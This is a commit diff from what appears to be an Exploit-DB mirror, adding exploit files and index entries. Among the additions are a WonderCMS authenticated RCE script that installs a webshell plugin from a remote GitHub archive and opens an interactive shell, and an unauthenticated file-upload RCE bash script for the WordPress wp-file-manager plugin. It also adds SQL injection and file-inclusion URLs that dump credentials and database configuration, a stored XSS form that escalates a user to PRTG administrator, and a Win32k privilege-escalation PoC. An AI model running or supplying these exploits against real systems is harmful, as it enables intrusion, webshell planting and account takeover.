sleep(1)
print(colored("[+] Get reverse shell","cyan"))
sendPayload(r,url,payload,token)
print(colored("[+] Good bye","cyan"))

103
exploits/php/webapps/49155.py Executable file
View file

@ -0,0 +1,103 @@
# Exploit Title: WonderCMS 3.1.3 - Authenticated Remote Code Execution
# Date: 2020-11-27
# Exploit Author: zetc0de
# Vendor Homepage: https://www.wondercms.com/
# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
# Version: 3.1.3
# Tested on: Ubuntu 16.04
# CVE : N/A
# WonderCMS is vulnerable to Authenticated Remote Code Execution.
# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.
# Using the theme/plugin installer attacker can install crafted plugin that contain a webshell and get RCE.
# python3 exploit.py http://wonder.com/loginURL GpIyq0RH
# -------------
# [+] Getting Token
# [+] Sending Payload
# [+] Get the shell
# [+] Enjoy!
# $id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
import requests
import sys
import re
from bs4 import BeautifulSoup
from termcolor import colored
print(colored('''
\ \ /_ \ \ | _ \ __| _ \ __| \ | __|
\ \ \ /( |. | | |_| / ( |\/ |\__ \
\_/\_/\___/_|\_|___/___|_|_\\___|_| _|____/
------[ Auth Remote Code Execution ]------
''',"blue"))
if len(sys.argv) != 3:
print(colored("[-] Usage : ./wonder.py loginURL password","red"))
exit()
loginURL = sys.argv[1]
password = sys.argv[2]
r = requests.session()
data = { "password" : password }
page = r.post(loginURL,data)
if "Wrong" in page.text:
print(colored("[!] Exploit Failed : Wrong Credential","red"))
exit()
print(colored("[+] Getting Token","blue"))
soup = BeautifulSoup(page.text, "html.parser")
allscript = soup.find_all("script")
no = 0
for i in allscript:
if "rootURL" in str(i):
url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
elif "token" in str(i):
token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
payload = "https://github.com/zetc0de/wonderplugin/archive/master.zip"
def sendPayload(req,url,payload,token):
getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token
req.get(getShell)
shell = url + "plugins/wonderplugin/evil.php"
checkshell = req.get(shell)
if "1337" in checkshell.text:
return True
else:
return False
print(colored("[+] Sending Payload","blue"))
shell = sendPayload(r,url,payload,token)
if shell == True:
print(colored("[+] Get the shell","blue"))
print(colored("[+] Enjoy!","blue"))
shell = url + "plugins/wonderplugin/evil.php"
while True:
cmd = input("$")
data = { "cmd" : cmd }
res = r.post(shell,data)
if res.status_code == 200:
print(res.text)
elif shell == False:
print(colored("[+] Get the shell","blue"))
print(colored("[+] Enjoy!","blue"))
shell = url + "plugins/wonderplugin-master/evil.php"
while True:
cmd = input("$")
data = { "cmd" : cmd }
res = r.post(shell,data)
if res.status_code == 200:
print(res.text)
else:
print(colored("[!] Failed to exploit","red"))

View file

@ -0,0 +1,34 @@
# Exploit Title: WonderCMS 3.1.3 - 'menu' Persistent Cross-Site Scripting
# Date: 20-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.wondercms.com/
# Version: 3.1.3
# Tested on: Windows 10/Kali Linux
# Contact: https://www.linkedin.com/in/hemantsolo/
Attack vector:
This vulnerability can results attacker to inject the XSS payload in the Setting - Menu and each time any user will visits the website directory, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
Vulnerable Parameters: Menu.
Steps-To-Reproduce:
1. Go to the Simple website builder.
2. Put this payload in Menu: "hemantsolo"><img src=x onerror=confirm(1)>"
3. Now go to the website and the XSS will be triggered.
GET /demo/hemantsolo-img-src-x-onerror-confirm-1 HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: 127.0.0.1/demo/hemantsolo-img-src-x-onerror-confirm-1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: PHPSESSID=31ce0448562cc182b5173a300a923b93

View file

@ -0,0 +1,20 @@
#Exploit Title: Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality
#Date: 2020-11-11
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://www.anuko.com/
#Software Link: https://www.anuko.com/time-tracker/index.htm
#Version: 1.19.23.5311
#Tested on: Kali Linux 2020.3
#CVE: CVE-2020-27423
#Proof Of Concept:
Anuko Time Tracker v1.19.23.5311 and prior, lacks rate limit on the
password reset module which allows attackers to perform Denial of Service
attack on any legitimate user's mailbox. Attacker could perform Denial of
Service on a legitimate user's mailbox
To exploit this vulnerability:
1. Goto 'Password Reset' module and enter any user's login name
2. Click on 'Reset Password' and capture this request.
3. Replay this request n number of times.
4. The victim receives a password reset email the number of times the
request is replayed.

View file

@ -0,0 +1,20 @@
#Exploit Title: Anuko Time Tracker 1.19.23.5311 - Password Reset Vulnerability leading to Account Takeover
#Date: 2020-11-11
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://www.anuko.com/
#Software Link: https://www.anuko.com/time-tracker/index.htm
#Version: 1.19.23.5311
#Tested on: Kali Linux 2020.3
#CVE: CVE-2020-27422
#Proof Of Concept:
In Anuko Time Tracker v1.19.23.5311 and prior, the password reset link
emailed to the user doesn't expire once used, hence the attacker could use
the same link to take over the victim's account. An Attacker needs to have
the link for successful exploitation. A malicious user could use the same
password reset link of the victim multiple times to take over the account.
To exploit this vulnerability:
1. Goto 'Password Reset' module and enter any user's login name
2. Reset the password using the password reset link received in the email
3. Use the same link again after resetting the password once
4. Password is changed again using the previously used link.

View file

@ -0,0 +1,48 @@
# Exploit Title: Simple College Website 1.0 - 'page' Local File Inclusion
# Date: 30-10-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + version: Apache/2.4.46 (Debian)
# CVE ID : N/A
# Local File Inclusion
#parameter Vulnerable: page
#Request
GET /college_website/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=7ls9j695lglc2eah5khecv2g66
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
#Response
HTTP/1.1 200 OK
Date: Sat, 31 Oct 2020 02:49:31 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15674
Connection: close
Content-Type: text/html; charset=UTF-8
<main class="">
PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjb2xsZWdlX3dlYnNpdGVfZGInKW9yIGRpZSgiQ291bGQgbm90IGNvbm5lY3QgdG8gbXlzcWwiLm15c3FsaV9lcnJvcigkY29uKSk7DQo=
</main>

View file

@ -0,0 +1,37 @@
# Exploit Title: Car Rental Management System 1.0 - SQL Injection / Local File include
# Date: 22-10-2020
# Exploit Author: Mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: parrot + Apache/2.4.46 (Debian)
SQL Injection
#Vulnerable Page: http://localhost/carRental/index.php?page=view_car&id=4
#POC 1:
http://localhost/carRental/index.php?page=view_car&id=-4+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10+from+users--
LFI
#Vulnerable Page1: http://localhost/carRental/index.php?page=about
#Vulnerable Page2:http://localhost/carRental/admin/index.php?page=movement
#POC 1:
http://localhost/carRental/index.php?page=php://filter/convert.base64-encode/resource=home
#POC 2:http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect
note POC 2 reading database information
#example :
curl -s -i POST http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect | grep view-panel -A 1
#result
<main id="view-panel" >
PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjYXJfcmVudGFsX2RiJylvciBkaWUoIkNvdWxkIG5vdCBjb25uZWN0IHRvIG15c3FsIi5teXNxbGlfZXJyb3IoJGNvbikpOw0K
#proof of concept picture
https://ibb.co/8Dd7d9G

View file

@ -0,0 +1,134 @@
# Exploit Title: WordPress Plugin Wp-FileManager 6.8 - RCE
# Date: September 4,2020
# Exploit Author: Mansoor R (@time4ster)
# Version Affected: 6.0 to 6.8
# Vendor URL: https://wordpress.org/plugins/wp-file-manager/
# Patch: Upgrade to wp-file-manager 6.9
# Tested on: wp-file-manager 6.0 (https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip)
#Description:
#The core of the issue began with the File Manager plugin renaming the extension on the elFinder librarys connector.minimal.php.dist file to .php so it could be executed directly, even though the connector file was not used by the File Manager itself. Such libraries often include example files that are not intended to be used “as-is” without adding access controls, and this file had no direct access restrictions, meaning the file could be accessed by anyone. This file could be used to initiate an elFinder command and was hooked to the elFinderConnector.class.php file
#Using connector.minimal.php file attacker can upload arbitrary file to the target (unauthenticated) & thus can achieve Remote code Execution.
#Patch commit details:
# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2373068%40wp-file-manager%2Ftrunk&old=2372895%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail=
#Credits:
#1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
#2. https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/
#!/bin/bash
echo
echo "============================================================================================"
echo "wp-file-manager wordpress plugin Unauthenticated RCE Exploit By: Mansoor R (@time4ster)"
echo "============================================================================================"
echo
function printHelp()
{
echo -e "
Usage:
-u|--wp_url Wordpress target url
-f|--upload_file Absolute location of local file to upload on the target.
-k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.
-v|--verbose Also prints curl command which is going to be executed
-h|--help Print Help menu
Example:
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
"
}
check="false"
verbose="false"
#Processing arguments
while [[ "$#" -gt 0 ]]
do
key="$1"
case "$key" in
-u|--wp_url)
wp_url="$2"
shift
shift # past argument
;;
-f|--upload_file)
upload_file="$2"
shift
shift
;;
-k|--check)
check="true"
shift
shift
;;
-v|--verbose)
verbose="true"
shift
;;
-h|--help)
printHelp
exit
shift
;;
*)
echo [-] Enter valid options
exit
;;
esac
done
[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL." && exit
[[ ! -s "$upload_file" ]] && [[ "$check" == "false" ]] && echo "[-] Either supply --upload_file or --check" && exit
#Script have dependency on jq
jq_cmd=$(command -v jq)
[[ -z "$jq_cmd" ]] && echo -e "[-] Script have dependency on jq. Insall jq from your package manager.\nFor debian based distro install using command: apt install jq" && exit
function checkWPFileManager()
{ #Takes 1 argument: url
url="$1"
target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint")
#echo "$response"
#{"error":["errUnknownCmd"]} is returned when vulnerable endpoint is hit
is_vulnerable=$(echo "$response" | grep "\{\"error\":\[\"errUnknownCmd\"\]\}")
[[ -n "$is_vulnerable" ]] && echo "[+] Target: $url is vulnerable"
[[ -z "$is_vulnerable" ]] && echo "[-] Target: $url is not vulnerable"
}
function exploitWPFileManager()
{ #Takes 3 arguments: url & file_upload & verbose(true/false)
declare url="$1"
declare file_upload="$2"
declare verbose="$3"
target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
if [ "$verbose" == "true" ];then
echo "curl POC :"
echo "curl -ks --max-time 5 --user-agent \"$user_agent\" -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" -F \"upload[]=@/$file_upload\" \"$target_endpoint\" "
echo
fi
response=$(curl -ks --max-time 5 --user-agent "$user_agent" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" \
-F "upload[]=@/$file_upload" \
"$target_endpoint" )
#echo "$response"
file_upload_url=$(echo "$response" | jq -r .added[0].url 2>/dev/null)
[[ -n "$file_upload_url" ]] && echo -e "[+] W00t! W00t! File uploaded successfully.\nLocation: $file_upload_url "
[[ -z "$file_upload_url" ]] && echo "[-] File upload failed."
}
[[ "$check" == "true" ]] && checkWPFileManager "$wp_url"
[[ -s "$upload_file" ]] && exploitWPFileManager "$wp_url" "$upload_file" "$verbose"
echo

View file

@ -0,0 +1,30 @@
# Exploit Title: aSc TimeTables 2021.6.2 - Denial of Service (PoC)
# Date: 2020-01-12
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.asctimetables.com/#!/home
# Software Link: https://www.asctimetables.com/#!/home/download
# Version: 2021.6.2
# Tested on: Windows 10 Home x64
# STEPS
# Open the program aSc Timetables 2021
# In File select the option New
# Put any letter in the fiel Name of the Schooland click Next
# In the next Windows click NEXT
# In the Step 3, in Subject click in New
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Metoo.txt"
# Paste the content in the field Subject title
# Click in OK
# End :)
buffer = 'Z' * 10000
try:
file = open("Metoo.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

View file

@ -0,0 +1,38 @@
# Exploit Title: IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path
# Discovery by: Manuel Alvarez
# Software link: https://www.pconlife.com/download/otherfile/20566/e82994866a370a480607637f28b82835/
# Discovery Date: 2020-11-27
# Tested Version: 1.0.6433.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i
"Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """
Audio service STacSV c:\Program Files\IDT\WDM\STacSV64.exe Auto
# Service info:
C:\>sc qc StacSV
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: StacSV
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\STacSV64.exe
GRUPO_ORDEN_CARGA : AudioGroup
ETIQUETA : 0
NOMBRE_MOSTRAR : Audio Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.

View file

@ -0,0 +1,113 @@
# Exploit Title: Microsoft Windows - Win32k Elevation of Privilege
# Author: nu11secur1ty
# Date: 08.03.2020
# Exploit Date: 01/14/2020
# Vendor: Microsoft
# Software Link: https://support.microsoft.com/en-us/help/3095649/win32k-sys-update-in-windows-october-2015
# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/raw/master/Undefined/CVE-2020-0624/win32k/__32-win32k.sys5.1.2600.1330.zip
# CVE: CVE-2020-0642
[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
[+] Source: readme from GitHUB
[Exploit Program Code]
// cve-2020-0624.cpp
#pragma warning(disable: 4005)
#pragma warning(disable: 4054)
#pragma warning(disable: 4152)
#pragma warning(disable: 4201)
#include <Windows.h>
#include "ntos.h"
typedef NTSTATUS(NTAPI* PFNUSER32CALLBACK)(PVOID);
HWND hParent{}, hChild{};
BOOL Flag1{}, Flag2{};
PFNUSER32CALLBACK OrgCCI2{}, OrgCCI3{};
NTSTATUS NTAPI NewCCI2(PVOID Param)
{
if (Flag1)
{
Flag1 = FALSE;
Flag2 = TRUE;
DestroyWindow(hParent);
}
return OrgCCI2(Param);
}
NTSTATUS NTAPI NewCCI3(PVOID Param)
{
if (Flag2)
{
ExitThread(0);
}
return OrgCCI3(Param);
}
int main()
{
DWORD OldProtect{};
PTEB teb = NtCurrentTeb();
PPEB peb = teb->ProcessEnvironmentBlock;
PVOID pCCI2 = &((PVOID*)peb->KernelCallbackTable)[2];
if (!VirtualProtect(pCCI2, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect))
return 0;
OrgCCI2 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI2,
&NewCCI2);
PVOID pCCI3 = &((PVOID*)peb->KernelCallbackTable)[3];
if (!VirtualProtect(pCCI3, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect))
return 0;
OrgCCI3 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI3,
&NewCCI3);
hParent = CreateWindow(L"ScrollBar", L"Parent", WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, NULL, NULL, NULL);
hChild = CreateWindow(L"ScrollBar", L"Child", WS_OVERLAPPEDWINDOW |
WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, 0, NULL,
NULL);
Flag1 = TRUE;
SendMessage(hChild, WM_LBUTTONDOWN, 0, 0);
return 0;
}
[Vendor]
Microsoft
[Vulnerability Type]
Privilege Escalation
[Description]
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
- - - more: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0642
[Disclosure Timeline]
An elevation of privilege vulnerability exists in Windows when the
Win32k component fails to properly handle objects in memory. An
attacker who successfully exploited this vulnerability could run
arbitrary code in kernel mode. An attacker could then install
programs; view, change, or delete data; or create new accounts with
full user rights.
To exploit this vulnerability, an attacker would first have to log on
to the system. An attacker could then run a specially crafted
application that could exploit the vulnerability and take control of
an affected system.
The update addresses this vulnerability by correcting how Win32k
handles objects in memory.
[+] Disclaimer
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.

View file

@ -0,0 +1,33 @@
# Exploit Title: PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS
# Date: 2/12/2020
# Exploit Author: Amin Rawah
# Vendor Homepage: https://www.paessler.com/prtg
# Software Link: https://www.paessler.com/prtg
# Version: 20.4.63.1412 x64
# Tested on: Windows
# CVE : CVE-2020-14073
Description:
Since there is a stored XSS affecting 'maps' in the system, a malicious user can escalte his/her privilege to PRTG Administrator.
Steps:
1- Login to PRTG system and view source code (currentUserId)
2- Create a map, add an element, double click the element and modify the HTML section 'HTML After'
3- In 'HTML After' add the following code:
<form action="http://<PRTG_SERVER>:8081/editsettings" method="POST" enctype="multipart/form-data">
<input type="hidden" name="name&#95;" value="PRTG&#32;Administrators" />
<input type="hidden" name="defaulthome&#95;" value="&#47;welcome&#46;htm" />
<input type="hidden" name="isadgroup" value="0" />
<input type="hidden" name="adusertype&#95;" value="0" />
<input type="hidden" name="aduserack&#95;" value="0" />
<input type="hidden" name="users&#95;" value="1" />
<input type="hidden" name="users&#95;" value="1" />
<input type="hidden" name="users&#95;&#95;check" value="<currentUserId>&#124;<YOUR_USERNAME>&#124;" />
<input type="hidden" name="users&#95;&#95;check" value="100&#124;PRTG&#32;System&#32;Administrator&#124;" />
<input type="hidden" name="id" value="200" />
<input type="hidden" name="targeturl" value="&#47;systemsetup&#46;htm&#63;tabid&#61;6" />
<input type="submit" value="Submit request" />
</form>
<svg/onload='document.forms[0].submit()'/>
4- Save and share the link with PRTG Administrator.
5- Login with the highest privilege.

View file

@ -11216,6 +11216,9 @@ id,file,description,date,author,type,platform,port
49142,exploits/windows/local/49142.txt,"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path",2020-12-01,"Emmanuel Lujan",local,windows,
49143,exploits/windows/local/49143.txt,"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path",2020-12-01,Jok3r,local,windows,
49144,exploits/windows/local/49144.bat,"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path",2020-12-01,"Metin Yunus Kandemir",local,windows,
49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,
49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18319,6 +18322,8 @@ id,file,description,date,author,type,platform,port
49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,
49106,exploits/windows/remote/49106.py,"Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution",2020-11-26,"Loke Hui Yi",remote,windows,
49127,exploits/windows/remote/49127.py,"YATinyWinFTP - Denial of Service (PoC)",2020-11-30,strider,remote,windows,
49169,exploits/multiple/remote/49169.sh,"Ksix Zigbee Devices - Playback Protection Bypass (PoC)",2020-12-02,"Alejandro Vazquez Vazquez",remote,multiple,
49176,exploits/linux/remote/49176.txt,"Mitel mitel-cs018 - Call Data Information Disclosure",2020-12-02,"Andrea Intilangelo",remote,linux,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -43367,3 +43372,30 @@ id,file,description,date,author,type,platform,port
49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020",2020-12-01,"Matthew Aberegg",webapps,php,
49140,exploits/php/webapps/49140.txt,"Social Networking Site - Authentication Bypass (SQli)",2020-12-01,gh1mau,webapps,php,
49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,
49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,
49148,exploits/multiple/webapps/49148.txt,"ILIAS Learning Management System 4.3 - SSRF",2020-12-02,Dot,webapps,multiple,
49149,exploits/php/webapps/49149.txt,"Pharmacy Store Management System 1.0 - 'id' SQL Injection",2020-12-02,"Aydın Baran Ertemir",webapps,php,
49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,
49151,exploits/multiple/webapps/49151.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF",2020-12-02,"Hardik Solanki",webapps,multiple,
49152,exploits/multiple/webapps/49152.txt,"Student Result Management System 1.0 - Authentication Bypass SQL Injection",2020-12-02,"Ritesh Gohil",webapps,multiple,
49153,exploits/multiple/webapps/49153.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting",2020-12-02,"Soushikta Chowdhury",webapps,multiple,
49154,exploits/php/webapps/49154.py,"WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution",2020-12-02,zetc0de,webapps,php,
49155,exploits/php/webapps/49155.py,"WonderCMS 3.1.3 - Authenticated Remote Code Execution",2020-12-02,zetc0de,webapps,php,
49156,exploits/windows/webapps/49156.txt,"PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS",2020-12-02,"Amin Rawah",webapps,windows,
49159,exploits/multiple/webapps/49159.txt,"Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting",2020-12-02,"Sagar Banwa",webapps,multiple,
49160,exploits/multiple/webapps/49160.txt,"NewsLister - Authenticated Persistent Cross-Site Scripting",2020-12-02,"Emre Aslan",webapps,multiple,
49161,exploits/multiple/webapps/49161.txt,"Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting",2020-12-02,"Parshwa Bhavsar",webapps,multiple,
49162,exploits/multiple/webapps/49162.txt,"Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting",2020-12-02,"Parshwa Bhavsar",webapps,multiple,
49163,exploits/multiple/webapps/49163.txt,"Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass",2020-12-02,"Aditya Wakhlu",webapps,multiple,
49164,exploits/php/webapps/49164.txt,"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting",2020-12-02,"Hemant Patidar",webapps,php,
49166,exploits/multiple/webapps/49166.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
49167,exploits/multiple/webapps/49167.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
49168,exploits/multiple/webapps/49168.txt,"DotCMS 20.11 - Stored Cross-Site Scripting",2020-12-02,"Hardik Solanki",webapps,multiple,
49170,exploits/multiple/webapps/49170.txt,"WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass",2020-12-02,"Aakash Madaan",webapps,multiple,
49171,exploits/multiple/webapps/49171.txt,"ChurchCRM 4.2.0 - CSV/Formula Injection",2020-12-02,"Mufaddal Masalawala",webapps,multiple,
49172,exploits/multiple/webapps/49172.txt,"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)",2020-12-02,"Mufaddal Masalawala",webapps,multiple,
49173,exploits/php/webapps/49173.txt,"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality",2020-12-02,"Mufaddal Masalawala",webapps,php,
49174,exploits/php/webapps/49174.txt,"Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover",2020-12-02,"Mufaddal Masalawala",webapps,php,
49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,

Can't render this file because it is too large.